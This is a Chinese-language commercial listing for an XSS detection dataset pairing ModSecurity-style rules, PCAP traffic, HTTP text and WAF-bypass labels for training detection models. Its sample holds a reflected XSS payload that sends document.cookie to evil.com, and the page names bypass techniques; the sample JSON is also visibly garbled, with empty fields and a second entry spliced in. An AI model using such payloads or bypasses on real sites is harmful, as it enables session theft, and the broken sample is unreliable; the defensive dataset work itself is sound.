XSS跨站脚本检测规则数据集

1,000~30,000条XSS检测五元组数据 | XML规则+PCAP流量+HTTP还原文本 | ATT&CK T1189映射 | bypass技巧标注

30,000条
检测五元组数据
XML规则
结构化检测规则
PCAP流量
真实网络流量
bypass标注
WAF绕过技巧
2-4周
交付周期

数据集概览

定义:XSS跨站脚本检测规则数据集是由长沙朗慧信息科技有限公司安全实验室构建的高质量Web安全检测数据集。每条数据以「XML规则 + PCAP流量 + HTTP还原文本 + 攻击类型标签 + 标准答案」五元组关联结构组织,覆盖反射型、存储型、DOM型、突变型(mXSS)、CSS注入五大子类型,附带WAF bypass技巧标注(编码绕过/大小写混淆/标签拆分/事件变异等),ATT&CK框架T1189(路过式攻击)映射,专为WAF/IDS XSS检测规则训练和XSS检测AI模型训练设计。

数据集名称XSS跨站脚本检测规则数据集
数据总量1,000~30,000条
数据类型五元组:XML规则 + PCAP流量 + HTTP还原文本 + 攻击类型标签 + 标准答案
数据来源朗慧安全实验室 + 漏洞平台验证数据
授权方式商业授权 附带完整授权文件
交付周期2-4周
XSS子类型反射型XSS(Reflected)、存储型XSS(Stored/Persistent)、DOM型XSS(DOM-based)、mXSS(突变XSS)、CSS注入(CSS Injection)
bypass标注包含WAF绕过技巧标签(编码绕过/大小写混淆/标签拆分/事件处理程序变异/JavaScript伪协议/HTML实体编码等)
ATT&CK映射T1189(Drive-by Compromise)、T1059(Command and Scripting Interpreter)
输出格式JSONL / CSV / Excel / PCAP
语言中英双语

核心数据字段

每条数据包含规则标识、XML检测规则、攻击Payload(含bypass技巧)、HTTP还原文本、PCAP流量及标准答案六大类别,覆盖从规则定义到bypass对抗的完整链路。

字段类别字段数典型字段
规则标识4rule_id(规则唯一ID)、rule_name(规则名称)、category(XSS子类型)、severity(严重级别:Critical/High/Medium)
XML检测规则3rule_xml(ModSecurity/CRS格式XML规则)、rule_signature(规则签名/正则模式)、rule_description(规则说明)
攻击Payload4payload(原始Payload)、payload_type(Payload类型)、bypass_technique(绕过技巧:编码/大小写/拆分/事件变异等)、payload_encoding(编码方式:URL/HTML Entity/Hex/Base64/UTF-7等)
HTTP还原文本3http_request(HTTP请求全文,含Headers+Body+Cookies)、http_response(HTTP响应全文)、context(注入上下文:HTML body/attribute/JavaScript/CSS/URL)
PCAP流量4pcap_file(PCAP文件名)、pcap_md5(文件MD5)、pcap_size(文件大小)、flow_signature(流量特征签名)
标准答案4is_attack(是否为攻击:true/false)、attack_type(攻击子类型)、bypass_detected(bypass是否成功绕过检测)、waf_name(被绕过的WAF名称/None)

数据样例展示

以下为脱敏后的结构化 JSON 样例,展示XSS五元组检测数据的典型格式(含bypass标注)。

{
  "entry_id": "XSS-2024-001523",
  "rule_id": "XSS-REFLECT-0089",
  "rule_name": "Reflected XSS Detection - Script Tag",
  "category": "Reflected XSS",
  "severity": "Critical",
  "rule_xml": "\n  detectXSS\n  block\n  ]*>[\\s\\S]*?\n  ARGS|REQUEST_BODY\n",
  "payload": "",
  "payload_type": "Reflected XSS - Cookie Theft",
  "bypass_technique": "None (standard script tag injection)",
  "payload_encoding": "None (plaintext)",
  "http_request": "GET /search?q=%3Cscript%3Efetch('https://evil.com/steal%3Fcookie%3D'%2Bdocument.cookie)%3C/script%3E HTTP/1.1\r\nHost: vulnerable-blog.com\r\nUser-Agent: Mozilla/5.0\r\nReferer: https://vulnerable-blog.com/\r\n\r\n",
  "http_response": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 315\r\n\r\n...
搜索结果:<script>fetch(...)</script>
...", "context": "HTML body - reflected search term", "pcap_info": { "pcap_file": "xss_reflected_script_tag_20240422.pcap", "pcap_md5": "a1b2c3d4e5f678901234567890abcdef", "pcap_size": "5678", "flow_signature": "HTTP GET with ...", "context": "JavaScript - innerHTML sink from location.hash source", "pcap_info": { "pcap_file": "xss_dom_fragment_sink_20240528.pcap", "pcap_md5": "c4d5e6789012f3456789a012b3c4d5e6", "pcap_size": "8901", "flow_signature": "HTTP GET without XSS payload in request (fragment excluded), response contains innerHTML sink with CSP header present" }, "technique_id": "T1189", "answer": { "is_attack": true, "attack_type": "DOM-based XSS", "bypass_detected": true, "waf_name": "Cloudflare WAF (fragment bypass)", "true_positive_rate": 0.91 } }

AI 应用场景

WAF XSS规则智能生成

30,000条XML检测规则+Payload+bypass技巧标注数据,训练AI自动从bypass样本中学习对抗模式,生成更具鲁棒性的XSS检测规则,持续提升WAF对抗bypass的能力。

XSS检测模型训练

五元组数据覆盖反射型、存储型、DOM型、mXSS等全部子类型,支持深度学习模型训练,使AI具备从HTTP流量、DOM结构和JavaScript代码中检测各类XSS攻击的能力。

前端安全扫描AI

丰富的XSS注入上下文标注(HTML body/attribute/JavaScript/CSS/URL),训练前端安全扫描AI自动识别Web应用中的XSS漏洞点,生成PoC并评估风险等级。

bypass检测增强

bypass技巧标签(编码绕过/大小写混淆/标签拆分/事件变异等)为AI提供高质量对抗样本,训练模型识别精心构造的bypass Payload,降低WAF绕过成功率。

Content-Security-Policy生成

基于XSS攻击向量和注入上下文数据,训练AI自动分析Web应用架构并生成最优CSP策略,在不过度限制功能的前提下最大化XSS防护效果。

安全代码审计

XSS Payload与漏洞点的映射数据,训练代码审计AI自动识别JavaScript和模板引擎中的不安全输出(innerHTML/document.write/eval等),生成修复建议并推荐安全的替代方案。

常见问题

数据集的授权方式是怎样的?可以用于商业AI训练吗?
本数据集由长沙朗慧信息科技有限公司提供商业授权,明确覆盖商业AI模型训练与安全产品研发场景。可在授权范围内合法使用数据集进行模型训练、WAF规则开发和安全产品评测。
bypass技巧标注覆盖哪些WAF平台?
bypass标注覆盖主流WAF/CDN平台(Cloudflare、AWS WAF、ModSecurity CRS、F5 BIG-IP ASM、Imperva等),标注了Payload是否成功绕过对应WAF。同时标注了绕过技巧类别(编码、大小写、拆分、事件变异等),便于训练通用bypass检测模型。
DOM型XSS的数据如何采集?
DOM型XSS的PCAP流量不含Payload(片段不发送到服务器),因此我们在HTTP还原文本中额外标注了source(来源:location.hash/document.referrer等)和sink(汇:innerHTML/eval/document.write等),帮助AI理解纯客户端攻击链路。
数据集是否包含CSP(Content Security Policy)相关信息?
部分HTTP还原文本包含CSP响应头,可用于分析CSP策略对XSS攻击的实际防护效果。标准答案中也标注了CSP是否生效的信息,支持训练CSP策略评估与生成模型。
如何获取数据或商务咨询?
本数据集由长沙朗慧信息科技有限公司旗下 DataAssetsAPI 平台运营。支持标准数据集和按需定制两种模式。请联系我们获取详细数据目录、样本预览和报价方案。

需要定制化的XSS检测数据方案?

长沙朗慧信息科技有限公司 DataAssetsAPI 平台,致力于为 AI 企业、科研机构提供高质量、合规的Web安全数据资产。支持按XSS子类型、按bypass技巧、按注入上下文灵活组合。

数据样本预览 · 定制化XSS检测方案 · 专业技术支持